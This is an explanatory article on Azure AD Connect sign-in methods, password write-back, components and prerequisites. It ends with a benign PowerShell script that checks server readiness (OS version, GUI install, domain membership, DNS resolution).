The Azure AD Connect synchronization service is used to synchronize identity data between your on-premise environment and Azure Active Directory.
Azure AD Connect offers two sign-in methods, Password Hash Synchronization and Pass-through Authentication, plus the related Password Write-Back feature:
Password Hash Synchronization
Here Azure AD Connect synchronizes a hash of the hash of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
The advantage is that you only need to maintain one password for authentication both in your on-premises environment and in the cloud. If a user changes his/her password in the on-premises AD, the new password will be synced to Azure AD, but the reverse will not happen.
Pass-through Authentication
This is somewhat similar to password hash synchronization, but here the user's password is validated directly against the on-premises Active Directory. That means that when a user tries to authenticate, the authentication request is sent to the on-premises Active Directory.
Password Write-Back
Password write-back is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time. In this configuration, as users change or reset their passwords using Self Service Password Reset (SSPR) in the cloud, the updated passwords are also written back to the on-premises AD DS environment. This can be configured along with Password Hash Synchronization or Pass-through Authentication if required.
There are two components for this service
- Azure AD Connect sync component – This is installed in the on-premises environment. It is recommended to install it on a separate domain-joined server and not directly on a domain controller.
- Azure AD Connect sync service – This service runs in Azure AD.
Prerequisites
- An Azure AD tenant
- You need to add and verify your domain in Azure AD
- The Azure AD Connect sync component must be installed on Windows Server 2012 Standard or later (on-premises). The server must have the full GUI installed and must be domain joined. It is recommended not to install it directly on a domain controller.
- An Azure AD Global Administrator account for the Azure AD tenant. The account must be a school or organization account and cannot be a Microsoft account.
- An Enterprise Administrator account for the on-premise Active Directory
- The Azure AD Connect server needs DNS resolution for both the intranet and the internet. The DNS server must be able to resolve names both for your on-premises Active Directory and for the Azure AD endpoints. When a user tries to authenticate, the sign-in page is redirected to the on-premises URL, depending on your configuration.
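The following PowerShell script is an added example (not Microsoft's own tooling) that checks the server prerequisites listed above before Azure AD Connect is installed. It assumes it is run in an elevated PowerShell session on the candidate server and uses login.microsoftonline.com as a representative Azure AD endpoint for the DNS check.

```powershell
# Added example: prerequisite checks for a prospective Azure AD Connect sync server.
# Assumptions: run elevated on the candidate Windows Server; login.microsoftonline.com
# is used here as a representative Azure AD endpoint (assumption, not from the page).
$results = [ordered]@{}

$os = Get-CimInstance -ClassName Win32_OperatingSystem
$cs = Get-CimInstance -ClassName Win32_ComputerSystem

# Windows Server 2012 reports NT version 6.2; ProductType 1 would be a client OS.
$results['OS is Windows Server 2012 or later'] =
    ([version]$os.Version -ge [version]'6.2') -and ($os.ProductType -ne 1)

# A server with the full GUI reports InstallationType "Server"; Server Core reports "Server Core".
$installType = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').InstallationType
$results['Full GUI installed (not Server Core)'] = ($installType -eq 'Server')

# The server must be domain joined ...
$results['Domain joined'] = [bool]$cs.PartOfDomain

# ... but should not itself be a domain controller (DomainRole 4 = backup DC, 5 = primary DC).
$results['Not a domain controller'] = ($cs.DomainRole -lt 4)

# DNS must resolve both the on-premises AD domain and the Azure AD endpoints.
function Test-NameResolves {
    param([string]$Name)
    try { [void](Resolve-DnsName -Name $Name -ErrorAction Stop); $true } catch { $false }
}
if ($cs.PartOfDomain) {
    $results["Resolves on-premises domain $($cs.Domain)"] = Test-NameResolves $cs.Domain
}
$results['Resolves login.microsoftonline.com'] = Test-NameResolves 'login.microsoftonline.com'

# Print one PASS/FAIL line per prerequisite.
$results.GetEnumerator() | ForEach-Object {
    $status = if ($_.Value) { 'PASS' } else { 'FAIL' }
    '{0,-5} {1}' -f $status, $_.Key
}
```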